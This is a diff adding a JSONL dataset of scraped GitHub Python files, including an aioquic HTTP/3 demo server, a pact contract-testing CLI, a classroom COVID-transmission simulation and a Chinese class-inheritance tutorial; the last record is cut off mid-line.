diff --git "a/1699.jsonl" "b/1699.jsonl" new file mode 100644--- /dev/null +++ "b/1699.jsonl" @@ -0,0 +1,1616 @@ +{"seq_id":"42462175928","text":"#\n# demo application for http3_server.py\n#\n\nimport datetime\nimport os\nfrom urllib.parse import urlencode\n\nimport httpbin\nfrom asgiref.wsgi import WsgiToAsgi\nfrom starlette.applications import Starlette\nfrom starlette.responses import PlainTextResponse, Response\nfrom starlette.routing import Mount, Route, WebSocketRoute\nfrom starlette.staticfiles import StaticFiles\nfrom starlette.templating import Jinja2Templates\nfrom starlette.types import Receive, Scope, Send\nfrom starlette.websockets import WebSocketDisconnect\n\nROOT = os.path.dirname(__file__)\nSTATIC_ROOT = os.environ.get(\"STATIC_ROOT\", os.path.join(ROOT, \"htdocs\"))\nSTATIC_URL = \"/\"\nLOGS_PATH = os.path.join(STATIC_ROOT, \"logs\")\nQVIS_URL = \"https://qvis.quictools.info/\"\n\ntemplates = Jinja2Templates(directory=os.path.join(ROOT, \"templates\"))\n\n\nasync def homepage(request):\n \"\"\"\n Simple homepage.\n \"\"\"\n await request.send_push_promise(\"/style.css\")\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\nasync def echo(request):\n \"\"\"\n HTTP echo endpoint.\n \"\"\"\n content = await request.body()\n media_type = request.headers.get(\"content-type\")\n return Response(content, media_type=media_type)\n\n\nasync def logs(request):\n \"\"\"\n Browsable list of QLOG files.\n \"\"\"\n logs = []\n for name in os.listdir(LOGS_PATH):\n if name.endswith(\".qlog\"):\n s = os.stat(os.path.join(LOGS_PATH, name))\n file_url = \"https://\" + request.headers[\"host\"] + \"/logs/\" + name\n logs.append(\n {\n \"date\": datetime.datetime.utcfromtimestamp(s.st_mtime).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n ),\n \"file_url\": file_url,\n \"name\": name[:-5],\n \"qvis_url\": QVIS_URL\n + \"?\"\n + urlencode({\"file\": file_url})\n + \"#/sequence\",\n \"size\": s.st_size,\n }\n )\n return templates.TemplateResponse(\n \"logs.html\",\n {\n \"logs\": sorted(logs, key=lambda x: x[\"date\"], reverse=True),\n \"request\": request,\n },\n )\n\n\nasync def padding(request):\n \"\"\"\n Dynamically generated data, maximum 50MB.\n \"\"\"\n size = min(50000000, request.path_params[\"size\"])\n return PlainTextResponse(\"Z\" * size)\n\n\nasync def ws(websocket):\n \"\"\"\n WebSocket echo endpoint.\n \"\"\"\n if \"chat\" in websocket.scope[\"subprotocols\"]:\n subprotocol = \"chat\"\n else:\n subprotocol = None\n await websocket.accept(subprotocol=subprotocol)\n\n try:\n while True:\n message = await websocket.receive_text()\n await websocket.send_text(message)\n except WebSocketDisconnect:\n pass\n\n\nasync def wt(scope: Scope, receive: Receive, send: Send) -> None:\n \"\"\"\n WebTransport echo endpoint.\n \"\"\"\n # accept connection\n message = await receive()\n assert message[\"type\"] == \"webtransport.connect\"\n await send({\"type\": \"webtransport.accept\"})\n\n # echo back received data\n while True:\n message = await receive()\n if message[\"type\"] == \"webtransport.datagram.receive\":\n await send(\n {\n \"data\": message[\"data\"],\n \"type\": \"webtransport.datagram.send\",\n }\n )\n elif message[\"type\"] == \"webtransport.stream.receive\":\n await send(\n {\n \"data\": message[\"data\"],\n \"stream\": message[\"stream\"],\n \"type\": \"webtransport.stream.send\",\n }\n )\n\n\nstarlette = Starlette(\n routes=[\n Route(\"/\", homepage),\n Route(\"/{size:int}\", padding),\n Route(\"/echo\", echo, methods=[\"POST\"]),\n Mount(\"/httpbin\", WsgiToAsgi(httpbin.app)),\n Route(\"/logs\", logs),\n WebSocketRoute(\"/ws\", ws),\n Mount(STATIC_URL, StaticFiles(directory=STATIC_ROOT, html=True)),\n ]\n)\n\n\nasync def app(scope: Scope, receive: Receive, send: Send) -> None:\n if scope[\"type\"] == \"webtransport\" and scope[\"path\"] == \"/wt\":\n await wt(scope, receive, send)\n else:\n await starlette(scope, receive, send)\n","repo_name":"aiortc/aioquic","sub_path":"examples/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":1417,"dataset":"github-code","pt":"52"} +{"seq_id":"33322653358","text":"from dataclasses import dataclass\nfrom typing import AsyncGenerator, Generic, TypeVar\n\nfrom nonebot.adapters.onebot.v11 import MessageSegment\n\nT = TypeVar(\"T\", bound=\"Music\", covariant=True)\n@dataclass\nclass SearchResult(Generic[T]):\n count: int\n musics: AsyncGenerator[T, None]\n\n\n@dataclass\nclass Music:\n name: str\n artists: str\n album: str\n vip: bool\n\n async def segment(self) -> MessageSegment:\n raise NotImplementedError\n\n @staticmethod\n async def from_id(id: str) -> MessageSegment:\n raise ValueError(\"该来源不支持从ID获取\")\n\n @staticmethod\n async def search(keyword: str, page_size: int) -> SearchResult[\"Music\"]:\n raise NotImplementedError\n","repo_name":"su226/IdhagnBot","sub_path":"plugins/music/sources/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"16376164373","text":"import numpy as np\n\ndef predict_class(model, data, label_dict):\n prediction = model.predict(data)\n prediction = np.where(prediction == np.amax(prediction))\n\n key = prediction[1][0]\n label = label_dict.get(key)\n\n return label\n\ndef predict_confidence(model, data, label_dict):\n prediction = model.predict(data)[0]\n prediction = np.round(prediction * 100, 3)\n\n class_pred = list(zip(label_dict.values(), prediction))\n\n return class_pred","repo_name":"AbdulAhadKhan/fetal-biometry-detection","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69890787686","text":"import logging\nimport os\nimport os.path\nimport sys\n\nimport click\nimport nose\nimport simplejson as json\n\nfrom pacte import contract_factory\nfrom pacte.case_builder import http_case_factory\nfrom pacte.contract import Contract\nfrom pacte.exceptions import PacteServiceException\nfrom pacte.states import load_states\nfrom pacte.utils.json import datetime_decoder\n\nlogger = logging.getLogger('pacte.pact')\nPROVIDER_TEST_RESULT = 'nosetests-ctp.xml'\nCONSUMER_TEST_RESULT = 'nosetests-ctc.xml'\n\n\ndef _exit(successful):\n if successful:\n sys.exit(0)\n sys.exit(1)\n\n\ndef _render_http_testsuite(app, contracts, states):\n provider_testcases = []\n for contract in contracts:\n for interaction in contract.interactions:\n state_cls = states.get(interaction.provider_state)\n if not state_cls:\n raise PacteServiceException('State \"%s\" is not prepared' % interaction.provider_state)\n provider_testcases.append(http_case_factory(app, state_cls, interaction, contract.consumer)())\n return provider_testcases\n\n\n@click.command()\n@click.option('--statedir', help='Directory for state preparation scripts. Defaults to \"tests/contract/provider\"',\n default='tests/contract/provider')\n@click.option(\n '--app', help='The Flask application instance. Defaults to \"app.app\"', default='app.app'\n)\n@click.argument(\n 'contract', type=click.Path(exists=True),\n)\ndef provider(statedir, app, contract):\n if os.path.exists(PROVIDER_TEST_RESULT):\n os.remove(PROVIDER_TEST_RESULT)\n if not os.path.exists(contract):\n logger.error('Contract file %s does not exist', contract)\n sys.exit(1)\n contracts = []\n if os.path.isdir(contract):\n for dirpath, dirnames, filenames in os.walk(contract):\n for filename in filenames:\n with open(os.path.join(dirpath, filename)) as f:\n contract = Contract.from_dict(json.loads(f.read(), object_pairs_hook=datetime_decoder))\n contracts.append(contract)\n else:\n with open(contract) as f:\n contract = Contract.from_dict(json.loads(f.read(), object_pairs_hook=datetime_decoder))\n contracts.append(contract)\n if not contracts:\n logger.info('No contract found')\n sys.exit()\n\n states = load_states(statedir)\n # It's important to provide all test cases in a list so that nosetests can\n # generate a proper xunit result summary file.\n test_cases = _render_http_testsuite(app, contracts, states)\n successful = nose.run(\n argv=[__file__, '-sv', '--logging-level=INFO', '--with-xunit', '--xunit-file=' + PROVIDER_TEST_RESULT],\n suite=test_cases,\n )\n _exit(successful)\n\n\n@click.command()\n@click.option(\n '--pact',\n help='Path to the directory to save contract files. It will be created if not exists. Defaults to \".pact\"',\n default='.pact'\n)\n@click.option(\n '--contract',\n help='Path to the consumer contract tests. Defaults to \"tests/contract/consumer\"',\n default='tests/contract/consumer'\n)\ndef consumer(pact, contract):\n if os.path.exists(CONSUMER_TEST_RESULT):\n os.remove(CONSUMER_TEST_RESULT)\n if not os.path.exists(contract):\n logger.warn('Contract file %s does not exist', contract)\n sys.exit() # exit with success, to be compatible with services with no provider state prepared\n contract_factory.reset_factory(pact)\n successful = nose.run(argv=[__file__, '-sv', '--with-xunit', '--xunit-file=' + CONSUMER_TEST_RESULT, contract])\n contract_factory.serialize(pact)\n _exit(successful)\n","repo_name":"hellmage/pacte","sub_path":"pacte/pact.py","file_name":"pact.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43520577772","text":"# import\nimport json\nfrom os import O_TEMPORARY\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport seaborn as sns\nimport math \nfrom src.classroom import *\nfrom src.infection import *\n\ndef load_parameters_av(filepath):\n '''\n Loads input and output directories\n\n Handles script running anywhere (terminal/notebook/etc...)\n '''\n try:\n with open(filepath) as fp:\n parameter = json.load(fp)\n except:\n try:\n with open('../' + filepath) as fp:\n parameter = json.load(fp)\n except:\n with open('../../' + filepath) as fp:\n parameter = json.load(fp)\n return parameter\n\nclass user_viz():\n '''\n simulation class that holds bulk of vars and functions\n\n :function init:\n :function load_parameters:\n :function merv_to_eff:\n :function generate_class_seating:\n :function model_run:\n \n '''\n def __init__(self, targets, parent=None):\n '''\n Generate local instance of room based on user and default inputs\n\n ToDo list:\n Improve Seating Chart and assignment for n students\n More classroom customization\n\n :param targets:\n '''\n super(user_viz, self).__init__()\n\n self.input_params = targets\n # for i in self.input_params:\n # print(i, self.input_params[i])\n\n # Simulation Parameters\n self.room_type = self.input_params['room_type']\n self.n_students = self.input_params['num_students']\n self.n_initial_students = self.input_params['num_initial']\n self.n_adults = self.input_params['num_adults']\n self.n_sims = self.input_params['n_sims']\n self.age_group = self.input_params['age_group']\n self.mins_per_class = self.input_params['mins_per_class']\n self.classes_per_day = self.input_params['classes_per_day']\n self.days_per_simulation = self.input_params['days_per_simulation']\n self.well_mixed_room = self.input_params['well_mixed_room']\n self.ventilation = self.input_params['ventilation']\n\n # Human Parameters\n self.mean_breathing_rate = self.input_params['breathing_rate']\n self.respiratory_activity = self.input_params['respiratory_activity']\n self.student_mask_percent = self.input_params['student_mask_percent']\n self.adult_mask_percent = self.input_params['adult_mask_percent']\n self.mask_protection_rate = self.input_params['mask_protection_rate']\n\n # Room Parameters\n if self.input_params['floor_area'] == 0:\n if self.room_type == 'small':\n self.floor_area = 900\n elif self.room_type == 'large':\n self.floor_area = 2000\n else:\n print('Please select Valid Room Type... Defaulting to small classroom')\n else:\n self.floor_area = self.input_params['floor_area']\n\n self.room_height = self.input_params['room_height']\n self.vent_size = self.input_params['vent_size']\n self.vent_locations = self.input_params['vent_locations']\n self.window_size = self.input_params['window_size']\n self.window_locations = self.input_params['window_locations']\n self.door_size = self.input_params['door_size']\n self.door_location = self.input_params['door_locations']\n self.seating_chart = self.input_params['seating_chart']\n\n # Vent Parameters\n # ACH is outdoor air_exchange-rate\n if self.input_params['ach_level'] == 0:\n if self.ventilation == 'Closed Windows':\n self.air_exchange_rate = 0.3 # TESTING for self.ventilation closed\n elif self.ventilation== 'Open Windows':\n self.air_exchange_rate = 2\n elif self.ventilation=='Mechanical':\n self.air_exchange_rate= 5\n elif self.ventilation=='Open Windows and Fans':\n self.air_exchange_rate = 6\n elif self.ventilation=='Better Mechanical':\n self.air_exchange_rate= 9\n elif self.ventilation=='Outdoors':\n self.air_exchange_rate= 20\n else:\n print('ERROR in setting ACH... Defaulting to 6 (Open Windows and Fans)')\n self.air_exchange_rate = 6\n else:\n self.air_exchange_rate = self.input_params['ach_level']\n \n \n self.merv_level = self.input_params['merv_level']\n self.recirc_rate = self.input_params['recirc_rate']\n self.relative_humidity = self.input_params['relative_humidity']\n self.primary_outdoor_air_fraction = self.input_params['primary_outdoor_air_fraction']\n\n # Advanced Parameters\n self.strain = self.input_params['strain']\n self.crit_drop_radius = self.input_params['crit_droplet_radius']\n self.viral_deact_rate = self.input_params['viral_deact_rate']\n self.immunity_rate = self.input_params['immunity_rate']\n self.child_vax_rate = self.input_params['child_vax_rate']\n self.adult_vax_rate = self.input_params['adult_vax_rate']\n self.viral_infectivity = self.input_params['viral_infectivity']\n if self.input_params['merv_level'] == 0:\n self.aerosol_filtration_eff = self.input_params['aerosol_filtration_eff']\n else:\n print('aerosol filtration derived from MERV level')\n # TODO: add default value for this based MERV level\n self.aerosol_filtration_eff = 0.06 / self.merv_level # default value\n\n self.output_filepath = \"output/\"\n\n def load_parameters(self, filepath):\n '''\n Loads seating from input directories\n\n :param filepath: path of json file to load\n '''\n # print(os.getcwd(), 'av_cwd')\n try:\n with open(filepath) as fp:\n parameter = json.load(fp)\n except:\n try:\n with open('../' + filepath) as fp:\n parameter = json.load(fp)\n except:\n with open('../../' + filepath) as fp:\n parameter = json.load(fp)\n\n return parameter\n\n def merv_to_eff(self):\n '''\n convert merv level effective ACH level\n\n TODO: use effective drop radius not critical radius\n\n :return: \n '''\n\n\n merv_dict = [\n {'merv': 1, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.01},\n {'merv': 2, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.01},\n {'merv': 3, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.01},\n {'merv': 4, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.01},\n {'merv': 5, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.2},\n {'merv': 6, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.35},\n {'merv': 7, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.50},\n {'merv': 8, '0.3-1': 0.01, '1-3': 0.20, '3-10': 0.70},\n {'merv': 9, '0.3-1': 0.01, '1-3': 0.35, '3-10': 0.75},\n {'merv': 10, '0.3-1': 0.01, '1-3': 0.50, '3-10': 0.80},\n {'merv': 11, '0.3-1': 0.2, '1-3': 0.65, '3-10': 0.85},\n {'merv': 12, '0.3-1': 0.35, '1-3': 0.80, '3-10': 0.90},\n {'merv': 13, '0.3-1': 0.50, '1-3': 0.85, '3-10': 0.90},\n {'merv': 14, '0.3-1': 0.75, '1-3': 0.90, '3-10': 0.95},\n {'merv': 15, '0.3-1': 0.85, '1-3': 0.90, '3-10': 0.95},\n {'merv': 16, '0.3-1': 0.95, '1-3': 0.95, '3-10': 0.95},\n {'merv': 17, '0.3-1': 0.9997, '1-3': 0.9997, '3-10': 0.9997},\n {'merv': 18, '0.3-1': 0.99997, '1-3': 0.99997, '3-10': 0.99997},\n {'merv': 19, '0.3-1': 0.999997, '1-3': 0.999997, '3-10': 0.999997},\n {'merv': 20, '0.3-1': 0.9999997, '1-3': 0.9999997, '3-10': 0.9999997},\n ]\n if self.merv_level == 0:\n return 0\n eff = 0\n merv = np.floor(max(self.merv_level, min(1, 20)))\n for item in merv_dict:\n if item['merv'] == merv:\n if self.crit_drop_radius < 1:\n eff = item['0.3-1']\n elif self.crit_drop_radius < 3:\n eff = item['1-3']\n else:\n eff = item['3-10']\n\n return eff\n\n def generate_class_seating(self):\n '''\n Based on:\n - class type\n - seating chart\n - number of students\n - number of adults\n \n Return dict of student_id: [x, y] for a good seating chart\n \n grid = .2 -> .8\n\n '''\n # square room ezpz\n max_width = int(self.floor_area / 10)\n min_width = 5\n max_length = int(self.floor_area / 10 - 10) # teacher in blank space\n min_length = 5\n num_seats_each_way = int(math.ceil(max_width / math.sqrt(self.n_students)))\n\n # create seats based on class type and seating chart\n if self.seating_chart == 'grid':\n x_s = [x for x in range(min_width, max_width + 1, num_seats_each_way)]\n y_s = [y for y in range(min_length, max_length + 1, num_seats_each_way)]\n x_y_combo = [(x, y) for x in x_s for y in y_s]\n seats = {}\n for i in range(self.n_students):\n seats[i] = x_y_combo[i]\n elif self.seating_chart == 'circular':\n pass\n else:\n print('please enter valid seating')\n pass\n print(seats)\n return seats\n\n # function to run model with user input\n def model_run(self):\n '''\n Updated 7/7/21 with _bus code\n\n 1 SETUP\n 2 LOADING\n 3 CONCENTRATION\n 4 MASK HISTOGRAM\n 5 AIRFLOW HISTOGRAM\n 6 SCATTER\n 7 RISK VS TIME\n\n Sim Variables\n class_arguments = {\n :param n_students: number of students in each sim\n :param n_initial: number of initial infected students \n :param n_adults: number of adults in each sim\n :param mask: likelihood of student having mask\n :param n_sims: number of simulations with new initial students \n :param duration_mins_step: time step in minutes\n :param duration_steps_day: number of steps in a day\n :param duration_days_sim: number of days to simulate \n :param seating_chart: (x,y) locations for student seating\n }\n v_d_arguments = {\n :param window_locations: (x,y,z) of window locations\n :param window_size: surface area of window\n :param vent_locations: (x,y,z) of vent locations\n :param vent_size: surface area of vent\n :param door_locations: (x,y,z) of door locations\n :param door_size: surface area of door\n :param air_exchange_rate: ACH exchange rate of air between room and outside\n }\n :param aerosol_t_rate: aerosol transmission rate\n\n :return:\n '''\n # update 7/18 \n # 0 Variables\n # Calculated parameters\n \n\n # 1 SETUP + CALCULATED VARIABLES\n input_args = {\n 'floor_area': self.floor_area,\n 'room_height': self.room_height,\n 'air_exchange_rate': self.air_exchange_rate,\n 'breathing_flow_rate': self.mean_breathing_rate,\n 'aerosol_filtration_eff': self.aerosol_filtration_eff,\n 'relative_humidity': self.relative_humidity,\n 'exhaled_air_inf': self.viral_infectivity,\n 'max_viral_deact_rate': self.viral_deact_rate,\n 'mask_passage_prob': self.mask_protection_rate,\n 'max_aerosol_radius': self.crit_drop_radius,\n 'primary_outdoor_air_fraction': self.primary_outdoor_air_fraction\n }\n\n self.baseline_srt = return_aerosol_transmission_rate(input_args)\n\n self.seats = self.generate_class_seating()\n sim_arguments = {\n 'n_students': self.n_students,\n 'n_initial': self.n_initial_students,\n 'n_adults': self.n_adults,\n 'student_mask_percent': self.student_mask_percent,\n 'adult_mask_percent': self.adult_mask_percent,\n 'n_sims': self.n_sims,\n 'mins_per_class': self.mins_per_class,\n 'classes_per_day': self.classes_per_day,\n 'days_per_simulation': self.days_per_simulation,\n 'seats': self.seats,\n 'floor_area': self.floor_area\n }\n v_d_arguments = {\n 'window_locations': self.window_locations,\n 'window_size': self.window_size,\n 'vent_locations': self.vent_locations,\n 'vent_size': self.vent_size,\n 'door_location': self.door_location,\n 'door_size': self.door_size,\n 'air_exchange_rate': self.air_exchange_rate\n }\n\n # 2 USER SIMULATIONS\n param_dict, output_df = classroom_simulation(sim_arguments, v_d_arguments, wmr=self.well_mixed_room, base_srt=self.baseline_srt)\n print('output df columns', output_df.columns)\n\n output_df.to_csv(self.output_filepath + 'sim_data.csv', index=False)\n # return param_dict, output_df\n # 3 DENSITY ESTIMATION OF /STEP TRANSMISSION RATE\n\n # out of practice!!!!\n\n plt.figure(figsize=(10, 10))\n density_df = output_df.copy()\n density_plot = density_df.groupby(['Day #', 'Step #', 'Minute #'])['Transmission by Minute'].mean()\n plt.hist(density_plot)\n\n density_filename = self.output_filepath + 'density_plot.png'\n plt.savefig(density_filename, dpi=300)\n\n\n # 4 MASK HISTOGRAM\n\n # make the plots from the dataframe!!!!\n\n # 5 AIRFLOW HISTOGRAM\n\n # 6 SCATTER LRT vs SRT vs CRT\n # infection rate vs distance\n # infections rate avg vs time\n # infection boundary of time vs distance\n\n # range_test_plot = density_\n\n # 7 RISK VS TIME\n\n\n\n\n\n\n # # 1 SETUP\n # print('Model Setup...')\n\n # # class_sim()\n\n # # run class model\n # class_seating = self.generate_class_seating()\n\n # # seat var is room type\n # # make varying input setup for ventilation\n\n # class_trip, conc_array, out_mat, chance_nonzero = class_sim(n_students = int(self.students_var), mask = self.mask_var, n_sims = self.number_simulations, duration = self.duration, initial_seating = self.room_type, loc_params=temp_loc) # replace default with selected\n\n # ### Validate using chance_nonzero\n\n\n\n # self.chance_nonzero = chance_nonzero\n # # print(chance_nonzero, 'more than none?')\n # self.conc_array = conc_array\n # self.class_trips.append(class_trip)\n # # print('model_run start')\n # plt.figure(figsize=(5,4))#, dpi=300)\n # plt.gcf().set_size_inches(5,4)\n # # plt.gcf().set_size_inches(5,4)\n # # ax = plt.gca()\n # pd.Series(class_trip).plot.kde(lw=2, c='r')\n # plt.title('Density estimation of exposure')\n # # plt.xlim(0, .004)\n # # print(plt.xticks())\n\n # # set x ticks\n # temp_x = np.array(plt.xticks()[0])\n # str_x = np.array([str(round(int * 100, 2))+'%' for int in temp_x])\n # plt.xticks(temp_x, str_x)\n\n # plt.ticklabel_format(axis=\"x\")#, style=\"sci\", scilimits=(0,0))\n\n # plt.yticks(np.arange(0, 3500, 700), np.arange(0, 3500, 700) / 3500)\n\n # ##### This is temporary chill tf out ####\n # # rescale y axis to be % based\n # plt.xlabel('Likelihood of exposure to infectious dose of particles ')\n # plt.ylabel('Density estimation of probability of occurrence')\n # plt.savefig('results/window_curve.png', dpi=300)\n # # plt.show()\n # print('model_run complete!')\n\n # # temp variables\n # self.chance_nonzero = 0\n # self.conc_array = 0\n\n \n\n\n # # 2 LOADING\n # plt.figure()\n\n # if self.room_type == 'small':\n # self.seat_dict = load_parameters_av(filepath='config/small_classroom.json')\n # elif self.room_type == 'large':\n # self.seat_dict = load_parameters_av(filepath='config/large_classroom.json')\n # # implement SEATING CHART OPTIONS ############################\n\n # # 3 CONCENTRATION + 1\n\n # print('Plotting Concentration ...')\n # x_arr = []\n # y_arr = []\n # for i in self.seat_dict.items(): ################### change seating\n # x_arr.append(i[1][1])\n # y_arr.append(i[1][0] * 1.5 + 1) # seat fix\n # rot = mpl.transforms.Affine2D().rotate_deg(180)\n\n # # Set up Figure\n # fig, ax1 = plt.subplots()\n # plt.matshow(out_mat, cmap=\"OrRd\", norm=mpl.colors.LogNorm())\n # plt.gcf().set_size_inches(2,2)\n # plt.suptitle('Viral Concentration Heatmap', fontsize=7.5)\n # plt.axis('off')\n # plt.text(.1, .01, '\\nSample proxy for air flow after ' + str(self.duration) + ' minutes\\n', fontsize=4)\n # plt.savefig(output_filepath + '_concentration.png', dpi=300)\n # plt.close()\n\n # # 4 MASK HISTOGRAM\n\n # fig_mask, ax_mask = plt.subplots()\n # mask_values = [70, 80, 90, 100]\n # mask_legend = [str(i) + '%' for i in mask_values]\n # print('ml', mask_legend)\n\n # for mask_ in mask_values:\n # '''\n # Note: Masks as referred to here are in terms of face masks\n\n # coding 'masks' will be noted when used\n # '''\n # class_trip_mask, conc_array_mask_mask, out_mat_mask, chance_nonzero_mask = class_sim(n_students = int(self.students_var), mask = self.mask_var, n_sims = self.number_simulations, duration = self.duration, initial_seating = self.room_type, loc_params=temp_loc) # replace default with selected\n\n\n # sns.distplot(list(class_trip_mask[2].values()), ax=ax_mask, rug=True, kde=False, hist_kws={\"histtype\": \"step\", \"linewidth\": 3, \"alpha\": 1})\n\n # fig_mask.savefig(output_filepath + '_masks.png', dpi=300)\n\n # 5 AIRFLOW HISTOGRAM\n\n\n\n # 6 SCATTER\n # 7 RISK VS TIME\n\n\n\n # print('Windows...')\n # fig2, ax2 = plt.subplots()\n # window_types = [0, 6]\n # win_out_df = pd.DataFrame(columns=window_types)\n # temp = 0.051\n # temp_step = 0.001\n\n # add dynamic x range ToDo\n #\n # for w in window_types:\n # bus_out_array, conc_array, out_mat, chance_nonzero, avg_mat = class_sim(int(self.students_var), self.mask_var, self.number_simulations, self.duration, self.seat_var, w) # WINDOW\n # x_range = [.051, .102, .153, .204]\n #\n # ## 7/4 TODO: why is it all going wrong\n #\n #\n # for i in range(len(x_range)):\n # if x_range[i] < max(bus_out_array[2].values()):\n # pass\n # else:\n # temp = x_range[i]\n # temp_step = 0.001 * (i + 1)\n\n\n # TODO: Check all values of KDE are positive\n\n # pd.Series(bus_out_array[2]).plot.kde(alpha=.5, ax=ax2)\n # pd.Series(bus_out_array[2]).plot.hist(alpha=.5, ax=ax2)\n\n ###############################################\n\n # SEABORN\n # sns.distplot(list(bus_out_array[2].values()), ax=ax2, rug=True, kde=False, hist_kws={\"histtype\": \"step\", \"linewidth\": 3, \"alpha\": 1})\n\n\n # fig2.legend(['Windows Closed', 'Windows Open 6 Inches'])\n # plt.xlabel('Mean likelihood of transmission at each step')\n # plt.ylabel('Number of students with this average risk of transmission')\n # seat_filepath_2 = output_filepath + '_windows.png'\n # fig2.savefig(seat_filepath_2, dpi=300)\n # plt.close(fig2)\n # print('Windows complete!')\n\n # Hist 3 Masks\n\n # print('Masks...')\n # fig3 = plt.figure(3)\n # mask_amount = [1, .9, .8, .7]\n # print('start masks')\n # colorlist = ['blue', 'green', 'yellow', 'red']\n # count_ = 0\n #\n # for m in mask_amount:\n # bus_out_array, conc_array, out_mat, chance_nonzero, avg_mat = class_sim(int(self.students_var), m, self.number_simulations, self.duration, self.seat_var, self.window_var) # SEATING\n # pd.Series(bus_out_array[2]).plot.hist(bins=np.arange(0, 0.056, 0.001), alpha=.5, color=colorlist[count_])\n # count_ += 1\n # plt.legend(['100% Mask compliance', '90% Mask compliance', '80% Mask compliance', '70% Mask compliance'])\n # plt.xlabel('Mean likelihood of transmission at each step')\n # plt.ylabel('Number of students with this average risk of transmission')\n # seat_filepath_3 = output_filepath + '_masks.png'\n # fig3.savefig(seat_filepath_3, dpi=300)\n # plt.close(fig3)\n # print('Masks complete!')\n\n\n\n # 5 SCATTER/KDE + 2\n\n\n\n\n # 6 T_RISK AVERAGE + 1\n","repo_name":"covABM/GeoACT_Classroom","sub_path":"av.py","file_name":"av.py","file_ext":"py","file_size_in_byte":20909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31909160670","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n2020/10/23 10:18 乔誉萱\n\n类的继承:\n1、继承是为了重用已经存在的数据和行为,减少重复代码\n2、子类可以继承父类的所有实例属性和方法,实例属性是可选的,可以继承,也可以不继承\n3、子类继承父类的类属性是不可选的,默认继承\n4、当子类重写了父类的方法,子类调用的就是自己的方法,父类方法不再调用(执行顺序是先子后父,自下而上的)\n5、当子类没有重写父类方法,调用的则是父类方法(执行顺序是先父后子,自上而下)\n'''\n\n'''案例1:类的继承、实例属性的继承'''\nclass Father(object):\n\tdef property(self):\n\t\tprint('我是父类')\n\nclass Son(Father):\n\tdef __init__(self,age):\n\t\tself.age = age\n\t\n\tdef property(self):\n\t\tprint('我是子类,我{0}岁了'.format(self.age))\n\nclass GrandSon(Son):\n\t# 如果此孙类没用init实例化属性,在需要继承父类属性时直接[self.变量名]即可,无需写Son.__init__(self,age)\n\tdef __init__(self,age,sex):\n\t\tSon.__init__(self,age) # 继承父类实例化属性\n\t\tself.sex = sex\n\t\n\tdef property(self):\n\t\tprint('我是孙类,我{0}岁了,我是{1}'.format(self.age,self.sex))\n\n# 实例化父类\nf = Father()\nf.property()\n\n# 实例化子类\ns = Son(30)\ns.property()\n\n# 实例化孙类\ngs = GrandSon(8,'男生')\ngs.property()\n\n\n\n\n'''案例2:类属性的继承'''\nclass ChinaPerson(object):\n\tchina = '地球'\n\tprint(china)\n\nclass UsaPerson(ChinaPerson):\n\tpass\n\nu = UsaPerson() # 实例化类\nu.china # UsaPerson类可以直接调用Person类的类属性\n\n\n'''\n案例3:多个类的继承。\n1、遵循从左到右的原则,Son先去Mother类中找eat,若没有再去Father中找,若还没有则去Person中找\n(虽然没有继承Person,但Person是Father的父类,若在Father类中未找到则会去父类Person中找)\n2、被继承的父类是有书写顺序的,必须是从下到上,即下面案例中的Son子类若写成:class Son(Father,Mother),程序会报错\n'''\n\nclass Person(object):\n\tdef eat(self):\n\t\tprint('人都喜欢吃')\n\nclass Father(Person):\n\tdef eat(self):\n\t\tprint('爸爸喜欢吃肉')\n\nclass Mother(Father):\n\tdef eat(self):\n\t\tprint('妈妈喜欢吃菜')\n\n\nclass Son(Mother,Father): #被继承的父类必须遵从从下到上的书写顺序,若这里的先写Father再写Mother,程序会报错\n\tpass\n\ns=Son()\ns.eat()\n\n","repo_name":"qiaoyuxuan/python","sub_path":"Demo/testTemp/ClassDemo/class_inherit.py","file_name":"class_inherit.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7062542404","text":"import abc\nimport threading\nimport typing\nimport enum\nimport queue\n\n\nReceiver = typing.Callable[[object], None]\n\n\nclass Server(abc.ABC):\n\n @abc.abstractmethod\n def set_receiver(self, receiver: Receiver):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def send(self, msg: object):\n raise NotImplementedError()\n\n\nclass Logger(abc.ABC):\n\n @abc.abstractmethod\n def log(self, msg: object):\n raise NotImplementedError()\n\n\nclass Direction(enum.Enum):\n SEND = 'send'\n RECEIVE = 'receive'\n\n\nclass ReplayError(Exception):\n \"\"\"Raised when a message is unexpected.\"\"\"\n\n\nclass ReplayRequestReply(threading.Thread, Server):\n\n def __init__(self, data):\n super(ReplayRequestReply, self).__init__()\n self._data = data\n self.index = 0\n self.q = queue.Queue()\n self.daemon = True\n self._receiver = None\n\n def set_receiver(self, receiver: Receiver):\n self._receiver = receiver\n\n def send(self, msg: object):\n self.q.put(msg)\n\n def run(self):\n while True:\n msg = self.q.get()\n if self.index >= len(self._data[Direction.SEND]):\n raise ReplayError(repr(msg))\n\n if self._data[Direction.SEND][self.index] != msg:\n raise ReplayError(repr(msg))\n\n if self.playback_index < len(self.data['receive']):\n self._receiver(self.data['receive'][self.playback_index])\n self.playback_index += 1\n\n\nclass Recorder:\n def __init__(self):\n self.data = 